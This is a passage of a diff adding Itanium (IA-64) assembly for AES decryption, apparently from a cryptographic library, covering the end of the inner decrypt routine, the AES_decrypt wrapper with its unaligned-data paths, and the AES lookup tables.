+{ .mmi;	LDKEY	t2=[rk0],2*KSZ		// 1/2:rk[2]
+	add	te31=te31,te0		// 1/0:te0+s0>>24
+	extr.u	te23=s3,8,8	}	// 1/1:s3>>8&0xff
+{ .mmi;	LDKEY	t3=[rk1],2*KSZ		// 1/3:rk[3]
+	add	te32=te32,te0		// 1/1:te0+s0
+	shr.u	te01=s1,twenty4	};;	// 1/1:s1>>24
+{ .mmi;	ld1	te31=[te31]		// 2/0:te0[s3&0xff]
+	add	te22=te22,te0		// 2/0:te0+s2>>8&0xff
+	extr.u	te20=s0,8,8	}	// 2/2:s0>>8&0xff
+{ .mmi;	ld1	te32=[te32]		// 2/1:te0[s0]
+	add	te23=te23,te0		// 2/1:te0+s3>>8
+	shr.u	te02=s2,twenty4	};;	// 2/2:s2>>24
+{ .mmi;	ld1	te22=[te22]		// 3/0:te0[s2>>8]
+	add	te20=te20,te0		// 3/2:te0+s0>>8
+	extr.u	te21=s1,8,8	}	// 3/3:s1>>8&0xff
+{ .mmi;	ld1	te23=[te23]		// 3/1:te0[s3>>8]
+	add	te00=te00,te0		// 3/0:te0+s0>>24
+	shr.u	te03=s3,twenty4	};;	// 3/3:s3>>24
+{ .mmi;	ld1	te20=[te20]		// 4/2:te0[s0>>8]
+	add	te21=te21,te0		// 4/3:te0+s2
+	extr.u	te13=s3,16,8	}	// 4/0:s1>>16&0xff
+{ .mmi;	ld1	te00=[te00]		// 4/0:te0[s0>>24]
+	add	te01=te01,te0		// 4/1:te0+s1>>24
+	shr.u	te11=s1,sixteen	};;	// 4/2:s3>>16
+{ .mmi;	ld1	te21=[te21]		// 5/3:te0[s1>>8]
+	add	te13=te13,te0		// 5/0:te0+s1>>16
+	extr.u	te10=s0,16,8	}	// 5/1:s2>>16&0xff
+{ .mmi;	ld1	te01=[te01]		// 5/1:te0[s1>>24]
+	add	te02=te02,te0		// 5/2:te0+s2>>24
+	and	te33=s3,maskff	};;	// 5/2:s1&0xff
+{ .mmi;	ld1	te13=[te13]		// 6/0:te0[s1>>16]
+	add	te10=te10,te0		// 6/1:te0+s2>>16
+	extr.u	te12=s2,16,8	}	// 6/3:s0>>16&0xff
+{ .mmi;	ld1	te02=[te02]		// 6/2:te0[s2>>24]
+	add	te03=te03,te0		// 6/3:te0+s0>>16
+	and	te30=s0,maskff	};;	// 6/3:s2&0xff
+
+{ .mmi;	ld1	te10=[te10]		// 7/1:te0[s2>>16]
+	add	te33=te33,te0		// 7/2:te0+s1&0xff
+	dep	te31=te22,te31,8,8}	// 7/0:
+{ .mmi;	ld1	te03=[te03]		// 7/3:te0[s3>>24]
+	add	te30=te30,te0		// 7/3:te0+s2
+	and	te11=te11,maskff};;	// 7/2:s3>>16&0xff
+{ .mmi;	ld1	te33=[te33]		// 8/2:te0[s1]
+	add	te11=te11,te0		// 8/2:te0+s3>>16
+	dep	te32=te23,te32,8,8}	// 8/1:
+{ .mmi;	ld1	te30=[te30]		// 8/3:te0[s2]
+	add	te12=te12,te0		// 8/3:te0+s0>>16
+	shl	te00=te00,twenty4};;	// 8/0:
+{ .mii;	ld1	te11=[te11]		// 9/2:te0[s3>>16]
+	dep	te31=te13,te31,16,8	// 9/0:
+	shl	te01=te01,twenty4};;	// 9/1:
+{ .mii;	ld1	te12=[te12]		// 10/3:te0[s0>>16]
+	dep	te33=te20,te33,8,8	// 10/2:
+	shl	te02=te02,twenty4};;	// 10/2:
+{ .mii;	xor	t0=t0,te31		// 11/0:
+	dep	te30=te21,te30,8,8	// 11/3:
+	shl	te10=te10,sixteen};;	// 11/1:
+{ .mii;	xor	r16=t0,te00		// 12/0:done!
+	dep	te33=te11,te33,16,8	// 12/2:
+	shl	te03=te03,twenty4};;	// 12/3:
+{ .mmi;	xor	t1=t1,te01		// 13/1:
+	xor	t2=t2,te02		// 13/2:
+	dep	te30=te12,te30,16,8};;	// 13/3:
+{ .mmi;	xor	t1=t1,te32		// 14/1:
+	xor	r24=t2,te33		// 14/2:done!
+	xor	t3=t3,te30	};;	// 14/3:
+{ .mib;	xor	r20=t1,te10		// 15/1:done!
+	xor	r28=t3,te03		// 15/3:done!
+	br.ret.sptk	b6	};;
+.endp	_ia64_AES_decrypt#
+
+// void AES_decrypt (const void *in,void *out,const AES_KEY *key);
+.global	AES_decrypt#
+.proc	AES_decrypt#
+.align	32
+AES_decrypt:
+	.prologue
+	.save	ar.pfs,pfssave
+{ .mmi;	alloc	pfssave=ar.pfs,3,1,12,0
+	and	out0=3,in0
+	mov	r3=ip			}
+{ .mmi;	ADDP	in0=0,in0
+	mov	loc0=psr.um
+	ADDP	out11=KSZ*60,in2	};;	// &AES_KEY->rounds
+
+{ .mmi;	ld4	out11=[out11]			// AES_KEY->rounds
+	add	out8=(AES_Td#-AES_decrypt#),r3	// Te0
+	.save	pr,prsave
+	mov	prsave=pr		}
+{ .mmi;	rum	1<<3				// clear um.ac
+	.save	ar.lc,lcsave
+	mov	lcsave=ar.lc		};;
+
+	.body
+#if defined(_HPUX_SOURCE)	// HPUX is big-endian, cut 15+15 cycles...
+{ .mib; cmp.ne	p6,p0=out0,r0
+	add	out0=4,in0
+(p6)	br.dpnt.many	.Ld_i_unaligned	};;
+
+{ .mmi;	ld4	out1=[in0],8		// s0
+	and	out9=3,in1
+	mov	twenty4=24		}
+{ .mmi;	ld4	out3=[out0],8		// s1
+	ADDP	rk0=0,in2
+	mov	sixteen=16		};;
+{ .mmi;	ld4	out5=[in0]		// s2
+	cmp.ne	p6,p0=out9,r0
+	mov	maskff=0xff		}
+{ .mmb;	ld4	out7=[out0]		// s3
+	ADDP	rk1=KSZ,in2
+	br.call.sptk.many	b6=_ia64_AES_decrypt	};;
+
+{ .mib;	ADDP	in0=4,in1
+	ADDP	in1=0,in1
+(p6)	br.spnt	.Ld_o_unaligned		};;
+
+{ .mii;	mov	psr.um=loc0
+	mov	ar.pfs=pfssave
+	mov	ar.lc=lcsave		};;
+{ .mmi;	st4	[in1]=r16,8		// s0
+	st4	[in0]=r20,8		// s1
+	mov	pr=prsave,0x1ffff	};;
+{ .mmb;	st4	[in1]=r24		// s2
+	st4	[in0]=r28		// s3
+	br.ret.sptk.many	b0	};;
+#endif
+
+.align	32
+.Ld_i_unaligned:
+{ .mmi;	add	out0=1,in0
+	add	out2=2,in0
+	add	out4=3,in0	};;
+{ .mmi;	ld1	r16=[in0],4
+	ld1	r17=[out0],4	}//;;
+{ .mmi;	ld1	r18=[out2],4
+	ld1	out1=[out4],4	};;	// s0
+{ .mmi;	ld1	r20=[in0],4
+	ld1	r21=[out0],4	}//;;
+{ .mmi;	ld1	r22=[out2],4
+	ld1	out3=[out4],4	};;	// s1
+{ .mmi;	ld1	r24=[in0],4
+	ld1	r25=[out0],4	}//;;
+{ .mmi;	ld1	r26=[out2],4
+	ld1	out5=[out4],4	};;	// s2
+{ .mmi;	ld1	r28=[in0]
+	ld1	r29=[out0]	}//;;
+{ .mmi;	ld1	r30=[out2]
+	ld1	out7=[out4]	};;	// s3
+
+{ .mii;
+	dep	out1=r16,out1,24,8	//;;
+	dep	out3=r20,out3,24,8	}//;;
+{ .mii;	ADDP	rk0=0,in2
+	dep	out5=r24,out5,24,8	//;;
+	dep	out7=r28,out7,24,8	};;
+{ .mii;	ADDP	rk1=KSZ,in2
+	dep	out1=r17,out1,16,8	//;;
+	dep	out3=r21,out3,16,8	}//;;
+{ .mii;	mov	twenty4=24
+	dep	out5=r25,out5,16,8	//;;
+	dep	out7=r29,out7,16,8	};;
+{ .mii;	mov	sixteen=16
+	dep	out1=r18,out1,8,8	//;;
+	dep	out3=r22,out3,8,8	}//;;
+{ .mii;	mov	maskff=0xff
+	dep	out5=r26,out5,8,8	//;;
+	dep	out7=r30,out7,8,8	};;
+
+{ .mib;	br.call.sptk.many	b6=_ia64_AES_decrypt	};;
+
+.Ld_o_unaligned:
+{ .mii;	ADDP	out0=0,in1
+	extr.u	r17=r16,8,8			// s0
+	shr.u	r19=r16,twenty4		}//;;
+{ .mii;	ADDP	out1=1,in1
+	extr.u	r18=r16,16,8
+	shr.u	r23=r20,twenty4		}//;;	// s1
+{ .mii;	ADDP	out2=2,in1
+	extr.u	r21=r20,8,8
+	shr.u	r22=r20,sixteen		}//;;
+{ .mii;	ADDP	out3=3,in1
+	extr.u	r25=r24,8,8			// s2
+	shr.u	r27=r24,twenty4		};;
+{ .mii;	st1	[out3]=r16,4
+	extr.u	r26=r24,16,8
+	shr.u	r31=r28,twenty4		}//;;	// s3
+{ .mii;	st1	[out2]=r17,4
+	extr.u	r29=r28,8,8
+	shr.u	r30=r28,sixteen		}//;;
+
+{ .mmi;	st1	[out1]=r18,4
+	st1	[out0]=r19,4		};;
+{ .mmi;	st1	[out3]=r20,4
+	st1	[out2]=r21,4		}//;;
+{ .mmi;	st1	[out1]=r22,4
+	st1	[out0]=r23,4		};;
+{ .mmi;	st1	[out3]=r24,4
+	st1	[out2]=r25,4
+	mov	pr=prsave,0x1ffff	}//;;
+{ .mmi;	st1	[out1]=r26,4
+	st1	[out0]=r27,4
+	mov	ar.pfs=pfssave		};;
+{ .mmi;	st1	[out3]=r28
+	st1	[out2]=r29
+	mov	ar.lc=lcsave		}//;;
+{ .mmi;	st1	[out1]=r30
+	st1	[out0]=r31		}
+{ .mfb;	mov	psr.um=loc0			// restore user mask
+	br.ret.sptk.many	b0	};;
+.endp	AES_decrypt#
+
+// leave it in .text segment...
+.align	64
+.global	AES_Te#
+.type	AES_Te#,@object
+AES_Te:	data4	0xc66363a5,0xc66363a5, 0xf87c7c84,0xf87c7c84
+	data4	0xee777799,0xee777799, 0xf67b7b8d,0xf67b7b8d
+	data4	0xfff2f20d,0xfff2f20d, 0xd66b6bbd,0xd66b6bbd
+	data4	0xde6f6fb1,0xde6f6fb1, 0x91c5c554,0x91c5c554
+	data4	0x60303050,0x60303050, 0x02010103,0x02010103
+	data4	0xce6767a9,0xce6767a9, 0x562b2b7d,0x562b2b7d
+	data4	0xe7fefe19,0xe7fefe19, 0xb5d7d762,0xb5d7d762
+	data4	0x4dababe6,0x4dababe6, 0xec76769a,0xec76769a
+	data4	0x8fcaca45,0x8fcaca45, 0x1f82829d,0x1f82829d
+	data4	0x89c9c940,0x89c9c940, 0xfa7d7d87,0xfa7d7d87
+	data4	0xeffafa15,0xeffafa15, 0xb25959eb,0xb25959eb
+	data4	0x8e4747c9,0x8e4747c9, 0xfbf0f00b,0xfbf0f00b
+	data4	0x41adadec,0x41adadec, 0xb3d4d467,0xb3d4d467
+	data4	0x5fa2a2fd,0x5fa2a2fd, 0x45afafea,0x45afafea
+	data4	0x239c9cbf,0x239c9cbf, 0x53a4a4f7,0x53a4a4f7
+	data4	0xe4727296,0xe4727296, 0x9bc0c05b,0x9bc0c05b
+	data4	0x75b7b7c2,0x75b7b7c2, 0xe1fdfd1c,0xe1fdfd1c
+	data4	0x3d9393ae,0x3d9393ae, 0x4c26266a,0x4c26266a
+	data4	0x6c36365a,0x6c36365a, 0x7e3f3f41,0x7e3f3f41
+	data4	0xf5f7f702,0xf5f7f702, 0x83cccc4f,0x83cccc4f
+	data4	0x6834345c,0x6834345c, 0x51a5a5f4,0x51a5a5f4
+	data4	0xd1e5e534,0xd1e5e534, 0xf9f1f108,0xf9f1f108
+	data4	0xe2717193,0xe2717193, 0xabd8d873,0xabd8d873
+	data4	0x62313153,0x62313153, 0x2a15153f,0x2a15153f
+	data4	0x0804040c,0x0804040c, 0x95c7c752,0x95c7c752
+	data4	0x46232365,0x46232365, 0x9dc3c35e,0x9dc3c35e
+	data4	0x30181828,0x30181828, 0x379696a1,0x379696a1
+	data4	0x0a05050f,0x0a05050f, 0x2f9a9ab5,0x2f9a9ab5
+	data4	0x0e070709,0x0e070709, 0x24121236,0x24121236
+	data4	0x1b80809b,0x1b80809b, 0xdfe2e23d,0xdfe2e23d
+	data4	0xcdebeb26,0xcdebeb26, 0x4e272769,0x4e272769
+	data4	0x7fb2b2cd,0x7fb2b2cd, 0xea75759f,0xea75759f
+	data4	0x1209091b,0x1209091b, 0x1d83839e,0x1d83839e
+	data4	0x582c2c74,0x582c2c74, 0x341a1a2e,0x341a1a2e
+	data4	0x361b1b2d,0x361b1b2d, 0xdc6e6eb2,0xdc6e6eb2
+	data4	0xb45a5aee,0xb45a5aee, 0x5ba0a0fb,0x5ba0a0fb
+	data4	0xa45252f6,0xa45252f6, 0x763b3b4d,0x763b3b4d
+	data4	0xb7d6d661,0xb7d6d661, 0x7db3b3ce,0x7db3b3ce
+	data4	0x5229297b,0x5229297b, 0xdde3e33e,0xdde3e33e
+	data4	0x5e2f2f71,0x5e2f2f71, 0x13848497,0x13848497
+	data4	0xa65353f5,0xa65353f5, 0xb9d1d168,0xb9d1d168
+	data4	0x00000000,0x00000000, 0xc1eded2c,0xc1eded2c
+	data4	0x40202060,0x40202060, 0xe3fcfc1f,0xe3fcfc1f
+	data4	0x79b1b1c8,0x79b1b1c8, 0xb65b5bed,0xb65b5bed
+	data4	0xd46a6abe,0xd46a6abe, 0x8dcbcb46,0x8dcbcb46
+	data4	0x67bebed9,0x67bebed9, 0x7239394b,0x7239394b
+	data4	0x944a4ade,0x944a4ade, 0x984c4cd4,0x984c4cd4
+	data4	0xb05858e8,0xb05858e8, 0x85cfcf4a,0x85cfcf4a
+	data4	0xbbd0d06b,0xbbd0d06b, 0xc5efef2a,0xc5efef2a
+	data4	0x4faaaae5,0x4faaaae5, 0xedfbfb16,0xedfbfb16
+	data4	0x864343c5,0x864343c5, 0x9a4d4dd7,0x9a4d4dd7
+	data4	0x66333355,0x66333355, 0x11858594,0x11858594
+	data4	0x8a4545cf,0x8a4545cf, 0xe9f9f910,0xe9f9f910
+	data4	0x04020206,0x04020206, 0xfe7f7f81,0xfe7f7f81
+	data4	0xa05050f0,0xa05050f0, 0x783c3c44,0x783c3c44
+	data4	0x259f9fba,0x259f9fba, 0x4ba8a8e3,0x4ba8a8e3
+	data4	0xa25151f3,0xa25151f3, 0x5da3a3fe,0x5da3a3fe
+	data4	0x804040c0,0x804040c0, 0x058f8f8a,0x058f8f8a
+	data4	0x3f9292ad,0x3f9292ad, 0x219d9dbc,0x219d9dbc
+	data4	0x70383848,0x70383848, 0xf1f5f504,0xf1f5f504
+	data4	0x63bcbcdf,0x63bcbcdf, 0x77b6b6c1,0x77b6b6c1
+	data4	0xafdada75,0xafdada75, 0x42212163,0x42212163
+	data4	0x20101030,0x20101030, 0xe5ffff1a,0xe5ffff1a
+	data4	0xfdf3f30e,0xfdf3f30e, 0xbfd2d26d,0xbfd2d26d
+	data4	0x81cdcd4c,0x81cdcd4c, 0x180c0c14,0x180c0c14
+	data4	0x26131335,0x26131335, 0xc3ecec2f,0xc3ecec2f
+	data4	0xbe5f5fe1,0xbe5f5fe1, 0x359797a2,0x359797a2
+	data4	0x884444cc,0x884444cc, 0x2e171739,0x2e171739
+	data4	0x93c4c457,0x93c4c457, 0x55a7a7f2,0x55a7a7f2
+	data4	0xfc7e7e82,0xfc7e7e82, 0x7a3d3d47,0x7a3d3d47
+	data4	0xc86464ac,0xc86464ac, 0xba5d5de7,0xba5d5de7
+	data4	0x3219192b,0x3219192b, 0xe6737395,0xe6737395
+	data4	0xc06060a0,0xc06060a0, 0x19818198,0x19818198
+	data4	0x9e4f4fd1,0x9e4f4fd1, 0xa3dcdc7f,0xa3dcdc7f
+	data4	0x44222266,0x44222266, 0x542a2a7e,0x542a2a7e
+	data4	0x3b9090ab,0x3b9090ab, 0x0b888883,0x0b888883
+	data4	0x8c4646ca,0x8c4646ca, 0xc7eeee29,0xc7eeee29
+	data4	0x6bb8b8d3,0x6bb8b8d3, 0x2814143c,0x2814143c
+	data4	0xa7dede79,0xa7dede79, 0xbc5e5ee2,0xbc5e5ee2
+	data4	0x160b0b1d,0x160b0b1d, 0xaddbdb76,0xaddbdb76
+	data4	0xdbe0e03b,0xdbe0e03b, 0x64323256,0x64323256
+	data4	0x743a3a4e,0x743a3a4e, 0x140a0a1e,0x140a0a1e
+	data4	0x924949db,0x924949db, 0x0c06060a,0x0c06060a
+	data4	0x4824246c,0x4824246c, 0xb85c5ce4,0xb85c5ce4
+	data4	0x9fc2c25d,0x9fc2c25d, 0xbdd3d36e,0xbdd3d36e
+	data4	0x43acacef,0x43acacef, 0xc46262a6,0xc46262a6
+	data4	0x399191a8,0x399191a8, 0x319595a4,0x319595a4
+	data4	0xd3e4e437,0xd3e4e437, 0xf279798b,0xf279798b
+	data4	0xd5e7e732,0xd5e7e732, 0x8bc8c843,0x8bc8c843
+	data4	0x6e373759,0x6e373759, 0xda6d6db7,0xda6d6db7
+	data4	0x018d8d8c,0x018d8d8c, 0xb1d5d564,0xb1d5d564
+	data4	0x9c4e4ed2,0x9c4e4ed2, 0x49a9a9e0,0x49a9a9e0
+	data4	0xd86c6cb4,0xd86c6cb4, 0xac5656fa,0xac5656fa
+	data4	0xf3f4f407,0xf3f4f407, 0xcfeaea25,0xcfeaea25
+	data4	0xca6565af,0xca6565af, 0xf47a7a8e,0xf47a7a8e
+	data4	0x47aeaee9,0x47aeaee9, 0x10080818,0x10080818
+	data4	0x6fbabad5,0x6fbabad5, 0xf0787888,0xf0787888
+	data4	0x4a25256f,0x4a25256f, 0x5c2e2e72,0x5c2e2e72
+	data4	0x381c1c24,0x381c1c24, 0x57a6a6f1,0x57a6a6f1
+	data4	0x73b4b4c7,0x73b4b4c7, 0x97c6c651,0x97c6c651
+	data4	0xcbe8e823,0xcbe8e823, 0xa1dddd7c,0xa1dddd7c
+	data4	0xe874749c,0xe874749c, 0x3e1f1f21,0x3e1f1f21
+	data4	0x964b4bdd,0x964b4bdd, 0x61bdbddc,0x61bdbddc
+	data4	0x0d8b8b86,0x0d8b8b86, 0x0f8a8a85,0x0f8a8a85
+	data4	0xe0707090,0xe0707090, 0x7c3e3e42,0x7c3e3e42
+	data4	0x71b5b5c4,0x71b5b5c4, 0xcc6666aa,0xcc6666aa
+	data4	0x904848d8,0x904848d8, 0x06030305,0x06030305
+	data4	0xf7f6f601,0xf7f6f601, 0x1c0e0e12,0x1c0e0e12
+	data4	0xc26161a3,0xc26161a3, 0x6a35355f,0x6a35355f
+	data4	0xae5757f9,0xae5757f9, 0x69b9b9d0,0x69b9b9d0
+	data4	0x17868691,0x17868691, 0x99c1c158,0x99c1c158
+	data4	0x3a1d1d27,0x3a1d1d27, 0x279e9eb9,0x279e9eb9
+	data4	0xd9e1e138,0xd9e1e138, 0xebf8f813,0xebf8f813
+	data4	0x2b9898b3,0x2b9898b3, 0x22111133,0x22111133
+	data4	0xd26969bb,0xd26969bb, 0xa9d9d970,0xa9d9d970
+	data4	0x078e8e89,0x078e8e89, 0x339494a7,0x339494a7
+	data4	0x2d9b9bb6,0x2d9b9bb6, 0x3c1e1e22,0x3c1e1e22
+	data4	0x15878792,0x15878792, 0xc9e9e920,0xc9e9e920
+	data4	0x87cece49,0x87cece49, 0xaa5555ff,0xaa5555ff
+	data4	0x50282878,0x50282878, 0xa5dfdf7a,0xa5dfdf7a
+	data4	0x038c8c8f,0x038c8c8f, 0x59a1a1f8,0x59a1a1f8
+	data4	0x09898980,0x09898980, 0x1a0d0d17,0x1a0d0d17
+	data4	0x65bfbfda,0x65bfbfda, 0xd7e6e631,0xd7e6e631
+	data4	0x844242c6,0x844242c6, 0xd06868b8,0xd06868b8
+	data4	0x824141c3,0x824141c3, 0x299999b0,0x299999b0
+	data4	0x5a2d2d77,0x5a2d2d77, 0x1e0f0f11,0x1e0f0f11
+	data4	0x7bb0b0cb,0x7bb0b0cb, 0xa85454fc,0xa85454fc
+	data4	0x6dbbbbd6,0x6dbbbbd6, 0x2c16163a,0x2c16163a
+// Te4:
+	data1	0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
+	data1	0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
+	data1	0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
+	data1	0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
+	data1	0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
+	data1	0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
+	data1	0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
+	data1	0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
+	data1	0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
+	data1	0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
+	data1	0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
+	data1	0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
+	data1	0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
+	data1	0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
+	data1	0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
+	data1	0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
+	data1	0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
+	data1	0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
+	data1	0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
+	data1	0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
+	data1	0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
+	data1	0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
+	data1	0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
+	data1	0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
+	data1	0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
+	data1	0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
+	data1	0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
+	data1	0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
+	data1	0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
+	data1	0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
+	data1	0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
+	data1	0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
+.size	AES_Te#,2048+256	// HP-UX assembler fails to ".-AES_Te#"
+
+.align	64
+.global	AES_Td#
+.type	AES_Td#,@object
+AES_Td:	data4	0x51f4a750,0x51f4a750, 0x7e416553,0x7e416553
+	data4	0x1a17a4c3,0x1a17a4c3, 0x3a275e96,0x3a275e96
+	data4	0x3bab6bcb,0x3bab6bcb, 0x1f9d45f1,0x1f9d45f1
+	data4	0xacfa58ab,0xacfa58ab, 0x4be30393,0x4be30393
+	data4	0x2030fa55,0x2030fa55, 0xad766df6,0xad766df6
+	data4	0x88cc7691,0x88cc7691, 0xf5024c25,0xf5024c25
+	data4	0x4fe5d7fc,0x4fe5d7fc, 0xc52acbd7,0xc52acbd7
+	data4	0x26354480,0x26354480, 0xb562a38f,0xb562a38f
+	data4	0xdeb15a49,0xdeb15a49, 0x25ba1b67,0x25ba1b67
+	data4	0x45ea0e98,0x45ea0e98, 0x5dfec0e1,0x5dfec0e1
+	data4	0xc32f7502,0xc32f7502, 0x814cf012,0x814cf012
+	data4	0x8d4697a3,0x8d4697a3, 0x6bd3f9c6,0x6bd3f9c6
+	data4	0x038f5fe7,0x038f5fe7, 0x15929c95,0x15929c95
+	data4	0xbf6d7aeb,0xbf6d7aeb, 0x955259da,0x955259da
+	data4	0xd4be832d,0xd4be832d, 0x587421d3,0x587421d3
+	data4	0x49e06929,0x49e06929, 0x8ec9c844,0x8ec9c844
+	data4	0x75c2896a,0x75c2896a, 0xf48e7978,0xf48e7978
+	data4	0x99583e6b,0x99583e6b, 0x27b971dd,0x27b971dd
+	data4	0xbee14fb6,0xbee14fb6, 0xf088ad17,0xf088ad17
+	data4	0xc920ac66,0xc920ac66, 0x7dce3ab4,0x7dce3ab4
+	data4	0x63df4a18,0x63df4a18, 0xe51a3182,0xe51a3182
+	data4	0x97513360,0x97513360, 0x62537f45,0x62537f45
+	data4	0xb16477e0,0xb16477e0, 0xbb6bae84,0xbb6bae84
+	data4	0xfe81a01c,0xfe81a01c, 0xf9082b94,0xf9082b94
+	data4	0x70486858,0x70486858, 0x8f45fd19,0x8f45fd19
+	data4	0x94de6c87,0x94de6c87, 0x527bf8b7,0x527bf8b7
+	data4	0xab73d323,0xab73d323, 0x724b02e2,0x724b02e2
+	data4	0xe31f8f57,0xe31f8f57, 0x6655ab2a,0x6655ab2a
+	data4	0xb2eb2807,0xb2eb2807, 0x2fb5c203,0x2fb5c203
+	data4	0x86c57b9a,0x86c57b9a, 0xd33708a5,0xd33708a5
+	data4	0x302887f2,0x302887f2, 0x23bfa5b2,0x23bfa5b2
+	data4	0x02036aba,0x02036aba, 0xed16825c,0xed16825c
+	data4	0x8acf1c2b,0x8acf1c2b, 0xa779b492,0xa779b492
+	data4	0xf307f2f0,0xf307f2f0, 0x4e69e2a1,0x4e69e2a1
+	data4	0x65daf4cd,0x65daf4cd, 0x0605bed5,0x0605bed5
+	data4	0xd134621f,0xd134621f, 0xc4a6fe8a,0xc4a6fe8a
+	data4	0x342e539d,0x342e539d, 0xa2f355a0,0xa2f355a0
+	data4	0x058ae132,0x058ae132, 0xa4f6eb75,0xa4f6eb75
+	data4	0x0b83ec39,0x0b83ec39, 0x4060efaa,0x4060efaa
+	data4	0x5e719f06,0x5e719f06, 0xbd6e1051,0xbd6e1051
+	data4	0x3e218af9,0x3e218af9, 0x96dd063d,0x96dd063d
+	data4	0xdd3e05ae,0xdd3e05ae, 0x4de6bd46,0x4de6bd46
+	data4	0x91548db5,0x91548db5, 0x71c45d05,0x71c45d05
+	data4	0x0406d46f,0x0406d46f, 0x605015ff,0x605015ff
+	data4	0x1998fb24,0x1998fb24, 0xd6bde997,0xd6bde997
+	data4	0x894043cc,0x894043cc, 0x67d99e77,0x67d99e77
+	data4	0xb0e842bd,0xb0e842bd, 0x07898b88,0x07898b88
+	data4	0xe7195b38,0xe7195b38, 0x79c8eedb,0x79c8eedb
+	data4	0xa17c0a47,0xa17c0a47, 0x7c420fe9,0x7c420fe9
+	data4	0xf8841ec9,0xf8841ec9, 0x00000000,0x00000000
+	data4	0x09808683,0x09808683, 0x322bed48,0x322bed48
+	data4	0x1e1170ac,0x1e1170ac, 0x6c5a724e,0x6c5a724e
+	data4	0xfd0efffb,0xfd0efffb, 0x0f853856,0x0f853856
+	data4	0x3daed51e,0x3daed51e, 0x362d3927,0x362d3927
+	data4	0x0a0fd964,0x0a0fd964, 0x685ca621,0x685ca621
+	data4	0x9b5b54d1,0x9b5b54d1, 0x24362e3a,0x24362e3a
+	data4	0x0c0a67b1,0x0c0a67b1, 0x9357e70f,0x9357e70f
+	data4	0xb4ee96d2,0xb4ee96d2, 0x1b9b919e,0x1b9b919e
+	data4	0x80c0c54f,0x80c0c54f, 0x61dc20a2,0x61dc20a2
+	data4	0x5a774b69,0x5a774b69, 0x1c121a16,0x1c121a16
+	data4	0xe293ba0a,0xe293ba0a, 0xc0a02ae5,0xc0a02ae5
+	data4	0x3c22e043,0x3c22e043, 0x121b171d,0x121b171d
+	data4	0x0e090d0b,0x0e090d0b, 0xf28bc7ad,0xf28bc7ad
+	data4	0x2db6a8b9,0x2db6a8b9, 0x141ea9c8,0x141ea9c8
+	data4	0x57f11985,0x57f11985, 0xaf75074c,0xaf75074c
+	data4	0xee99ddbb,0xee99ddbb, 0xa37f60fd,0xa37f60fd
+	data4	0xf701269f,0xf701269f, 0x5c72f5bc,0x5c72f5bc
+	data4	0x44663bc5,0x44663bc5, 0x5bfb7e34,0x5bfb7e34
+	data4	0x8b432976,0x8b432976, 0xcb23c6dc,0xcb23c6dc
+	data4	0xb6edfc68,0xb6edfc68, 0xb8e4f163,0xb8e4f163
+	data4	0xd731dcca,0xd731dcca, 0x42638510,0x42638510
+	data4	0x13972240,0x13972240, 0x84c61120,0x84c61120
+	data4	0x854a247d,0x854a247d, 0xd2bb3df8,0xd2bb3df8
+	data4	0xaef93211,0xaef93211, 0xc729a16d,0xc729a16d
+	data4	0x1d9e2f4b,0x1d9e2f4b, 0xdcb230f3,0xdcb230f3
+	data4	0x0d8652ec,0x0d8652ec, 0x77c1e3d0,0x77c1e3d0
+	data4	0x2bb3166c,0x2bb3166c, 0xa970b999,0xa970b999
+	data4	0x119448fa,0x119448fa, 0x47e96422,0x47e96422
+	data4	0xa8fc8cc4,0xa8fc8cc4, 0xa0f03f1a,0xa0f03f1a
+	data4	0x567d2cd8,0x567d2cd8, 0x223390ef,0x223390ef
+	data4	0x87494ec7,0x87494ec7, 0xd938d1c1,0xd938d1c1
+	data4	0x8ccaa2fe,0x8ccaa2fe, 0x98d40b36,0x98d40b36
+	data4	0xa6f581cf,0xa6f581cf, 0xa57ade28,0xa57ade28
+	data4	0xdab78e26,0xdab78e26, 0x3fadbfa4,0x3fadbfa4
+	data4	0x2c3a9de4,0x2c3a9de4, 0x5078920d,0x5078920d
+	data4	0x6a5fcc9b,0x6a5fcc9b, 0x547e4662,0x547e4662
